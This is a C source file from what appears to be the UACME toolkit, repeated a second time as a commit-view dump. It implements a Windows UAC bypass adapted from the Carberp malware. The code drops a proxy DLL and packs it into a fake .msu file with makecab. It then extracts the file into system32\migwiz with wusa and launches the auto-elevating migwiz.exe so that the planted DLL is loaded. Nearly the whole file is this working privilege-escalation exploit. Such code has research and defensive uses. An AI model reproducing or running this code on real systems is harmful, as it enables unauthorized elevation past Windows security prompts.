UACME/Source/Akagi/carberp.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2015
*
*  TITLE:       CARBERP.C
*
*  VERSION:     1.20
*
*  DATE:        29 Mar 2015
*
*  Tweaked Carberp method with migwiz as dll hijacking target.
*  Original Carberp is exploiting mcx2prov.exe in ehome.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

/*
* ucmWusaMethod
*
* Purpose:
*
* Build and install fake msu packet then run migwiz.
*
*/
BOOL ucmWusaMethod(
	PVOID ProxyDll,
	DWORD ProxyDllSize
	)
{
	BOOL bResult = FALSE, cond = FALSE;
	WCHAR szDllFileName[MAX_PATH + 1];
	WCHAR szMsuFileName[MAX_PATH + 1];
	WCHAR szCmd[MAX_PATH * 4];

	RtlSecureZeroMemory(szDllFileName, sizeof(szDllFileName));
	RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));

	do {

		if (ExpandEnvironmentStringsW(L"%temp%\\wdscore.dll",
			szDllFileName, MAX_PATH) == 0)
		{
			break;
		}

		if (ExpandEnvironmentStringsW(L"%temp%\\wdscore.msu",
			szMsuFileName, MAX_PATH) == 0)
		{
			break;
		}

		//drop proxy dll
		if (!supWriteBufferToFile(szDllFileName, ProxyDll, ProxyDllSize)) {
			OutputDebugString(TEXT("[UCM] Failed to drop proxy dll"));
			break;
		}

		//create cab with msu extension
		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
		wsprintfW(szCmd, L" /V1 %ws %ws", szDllFileName, szMsuFileName);
		if (!supRunProcess(L"makecab.exe", szCmd)) {
			OutputDebugString(TEXT("[UCM] Makecab failed"));
			break;
		}

		//
		// Target is migwiz because it has manifest with access = HighestAvailable and 
		// it is vulnerable to delay load dll attack.
		//

		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
		wsprintfW(szCmd, L"/c wusa %ws /extract:%%windir%%\\system32\\migwiz", szMsuFileName);
		if (!supRunProcess(L"cmd.exe", szCmd)) {
			OutputDebugString(TEXT("[UCM] Wusa failed"));
			break;
		}

		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
		if (ExpandEnvironmentStringsW(L"%systemroot%\\system32\\migwiz\\migwiz.exe",
			szCmd, MAX_PATH) == 0)
		{
			break;
		}
		bResult = supRunProcess(szCmd, NULL);

	} while (cond);

	//cleanup
	if (szDllFileName[0] != 0) {
		DeleteFileW(szDllFileName);
	}
	if (szMsuFileName[0] != 0) {
		DeleteFileW(szMsuFileName);
	}

	return bResult;
}
v 1.2.0 Tweaked Win32/Carberp method added 2015-03-29 08:12:55 +00:00			`/*******************************************************************************`
			`*`
			`* (C) COPYRIGHT AUTHORS, 2014 - 2015`
			`*`
			`* TITLE: CARBERP.C`
			`*`
			`* VERSION: 1.20`
			`*`
			`* DATE: 29 Mar 2015`
			`*`
			`* Tweaked Carberp method with migwiz as dll hijacking target.`
			`* Original Carberp is exploiting mcx2prov.exe in ehome.`
			`*`
			`* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF`
			`* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED`
			`* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A`
			`* PARTICULAR PURPOSE.`
			`*`
			`*******************************************************************************/`
			`#include "global.h"`

			`/*`
			`* ucmWusaMethod`
			`*`
			`* Purpose:`
			`*`
			`* Build and install fake msu packet then run migwiz.`
			`*`
			`*/`
			`BOOL ucmWusaMethod(`
			`PVOID ProxyDll,`
			`DWORD ProxyDllSize`
			`)`
			`{`
			`BOOL bResult = FALSE, cond = FALSE;`
			`WCHAR szDllFileName[MAX_PATH + 1];`
			`WCHAR szMsuFileName[MAX_PATH + 1];`
			`WCHAR szCmd[MAX_PATH * 4];`

			`RtlSecureZeroMemory(szDllFileName, sizeof(szDllFileName));`
			`RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));`

			`do {`

			`if (ExpandEnvironmentStringsW(L"%temp%\\wdscore.dll",`
			`szDllFileName, MAX_PATH) == 0)`
			`{`
			`break;`
			`}`

			`if (ExpandEnvironmentStringsW(L"%temp%\\wdscore.msu",`
			`szMsuFileName, MAX_PATH) == 0)`
			`{`
			`break;`
			`}`

			`//drop proxy dll`
			`if (!supWriteBufferToFile(szDllFileName, ProxyDll, ProxyDllSize)) {`
			`OutputDebugString(TEXT("[UCM] Failed to drop proxy dll"));`
			`break;`
			`}`

			`//create cab with msu extension`
			`RtlSecureZeroMemory(szCmd, sizeof(szCmd));`
			`wsprintfW(szCmd, L" /V1 %ws %ws", szDllFileName, szMsuFileName);`
			`if (!supRunProcess(L"makecab.exe", szCmd)) {`
			`OutputDebugString(TEXT("[UCM] Makecab failed"));`
			`break;`
			`}`

			`//`
			`// Target is migwiz because it has manifest with access = HighestAvailable and`
			`// it is vulnerable to delay load dll attack.`
			`//`

			`RtlSecureZeroMemory(szCmd, sizeof(szCmd));`
			`wsprintfW(szCmd, L"/c wusa %ws /extract:%%windir%%\\system32\\migwiz", szMsuFileName);`
			`if (!supRunProcess(L"cmd.exe", szCmd)) {`
			`OutputDebugString(TEXT("[UCM] Wusa failed"));`
			`break;`
			`}`

			`RtlSecureZeroMemory(szCmd, sizeof(szCmd));`
			`if (ExpandEnvironmentStringsW(L"%systemroot%\\system32\\migwiz\\migwiz.exe",`
			`szCmd, MAX_PATH) == 0)`
			`{`
			`break;`
			`}`
			`bResult = supRunProcess(szCmd, NULL);`

			`} while (cond);`

			`//cleanup`
			`if (szDllFileName[0] != 0) {`
			`DeleteFileW(szDllFileName);`
			`}`
			`if (szMsuFileName[0] != 0) {`
			`DeleteFileW(szMsuFileName);`
			`}`

			`return bResult;`
			`}`